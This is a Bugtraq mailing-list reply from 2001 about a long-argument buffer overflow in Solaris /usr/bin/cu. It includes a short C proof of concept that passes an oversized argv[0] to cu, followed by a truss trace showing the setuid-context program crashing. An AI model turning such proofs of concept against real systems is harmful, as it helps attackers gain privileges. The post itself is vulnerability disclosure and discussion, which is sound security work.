Bugtraq mailing list archives
Re: Solaris /usr/bin/cu Vulnerability
From: Dan Harkless <dan-bugtraq () DILVISH SPEED NET>
Date: Tue, 30 Jan 2001 21:18:32 -0800
optyx <optyx () UBERHAX0R NET> writes:
Dan Harkless <dan-bugtraq () DILVISH SPEED NET> wrote:Are you implying the above patches fix the cu long hardlink name vulnerability? This is not the case, at least on 2.6: # cat > cu_exploit.c #include <stdio.h> void main(int argc,char **argv) { char *buf; buf = (char *) malloc(atoi(argv[1])*sizeof(char)); memset(buf,0x41,atoi(argv[1])-1); buf[atoi(argv[1])-1]=0; execl("/usr/bin/cu",buf,(char *)0); } # gcc cu_exploit.c cu_exploit.c: In function `main': cu_exploit.c:4: warning: return type of `main' is not `int' # a.out Segmentation faultsee that atoi(argv[1])? a.out crashed not /usr/bin/cu. try a.out 4000 or whatever number next time, or trace through it with gdb.
Right, sorry. I had the 4000 (actually 40000 -- didn't crash with only 4000) in there when I was running it originally but forgot to include it in my proof-of-concept session. Here's the correct version (ellipsis in the Usage and \-line-wrapping mine): # a.out 4000 Usage: AAA[...]AAA [-dhtnLC] [-c device] [-s speed] [-l line] [-b 7|8] [-o | -e] telno | systemname [local-cmd] # a.out 40000 Segmentation Fault # truss a.out 40000 execve("./a.out", 0xEFFFFC98, 0xEFFFFCA4) argc = 2 open("/dev/zero", O_RDONLY) = 3 mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\ 0) = 0xEF7B0000 stat("a.out", 0xEFFFF998) = 0 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libc.so.1", O_RDONLY) = 4 fstat(4, 0xEFFFF734) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF7A0000 mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF6C0000 mmap(0xEF763000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF763000 mmap(0xEF76A000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF76A000 munmap(0xEF754000, 61440) = 0 memcntl(0xEF6C0000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libdl.so.1", O_RDONLY) = 4 fstat(4, 0xEFFFF734) = 0 mmap(0xEF7A0000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\ = 0xEF7A0000 close(4) = 0 open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\ Err#2 ENOENT close(3) = 0 brk(0x00020BA0) = 0 brk(0x0002ABA0) = 0 execve("/usr/bin/cu", 0xEFFFFBB8, 0xEFFFFCB0) argc = 1 open("/dev/zero", O_RDONLY) = 3 mmap(0x00000000, 40960, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\ 0) = 0xEF7B0000 stat("/usr/bin/cu", 0xEFFF5D60) = 0 open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\ 0) = 0xEF7A0000 open("/usr/local/lib/libnsl.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libnsl.so.1", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF790000 mmap(0x00000000, 581632, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF700000 mmap(0xEF780000, 32812, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 458752) = 0xEF780000 mmap(0xEF789000, 19976, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF789000 munmap(0xEF771000, 61440) = 0 memcntl(0xEF700000, 70140, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 open("/usr/local/lib/libsocket.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libsocket.so.1", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\ = 0xEF790000 mmap(0x00000000, 102400, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF6E0000 mmap(0xEF6F7000, 4089, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xEF6F7000 mmap(0xEF6F8000, 388, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6F8000 munmap(0xEF6E8000, 61440) = 0 memcntl(0xEF6E0000, 12072, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libc.so.1", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\ = 0xEF790000 mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF600000 mmap(0xEF6A3000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF6A3000 mmap(0xEF6AA000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6AA000 munmap(0xEF694000, 61440) = 0 memcntl(0xEF600000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT open("/usr/lib/libdl.so.1", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\ = 0xEF790000 close(4) = 0 open("/usr/local/lib/libmp.so.2", O_RDONLY) Err#2 ENOENT open("/usr/lib/libmp.so.2", O_RDONLY) = 4 fstat(4, 0xEFFF5AFC) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xEF6D0000 mmap(0x00000000, 77824, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\ 0xEF5E0000 mmap(0xEF5F2000, 3581, PROT_READ|PROT_WRITE|PROT_EXEC,\ MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xEF5F2000 munmap(0xEF5E3000, 61440) = 0 memcntl(0xEF5E0000, 3020, MC_ADVISE, 0x0003, 0, 0) = 0 close(4) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\ 0) = 0xEF6C0000 open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\ Err#2 ENOENT close(3) = 0 munmap(0xEF6D0000, 4096) = 0 Incurred fault #6, FLTBOUNDS %pc = 0xEF624694 siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000 *** process killed *** As you can see, exec() has passed control over to /usr/bin/cu when we seg fault. ---------------------------------------------------------------------- Dan Harkless | To prevent SPAM contamination, please dan-bugtraq () dilvish speed net | do not mention this private email SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
Current thread:
- Solaris /usr/bin/cu Vulnerability Pablo Sor (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Casper Dik (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Solaris /usr/bin/cu Vulnerability hal King (Jan 23)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 30)
- <Possible follow-ups>
- Re: Solaris /usr/bin/cu Vulnerability Konrad Rieck (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Wietse Venema (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability optyx (Jan 30)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 31)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)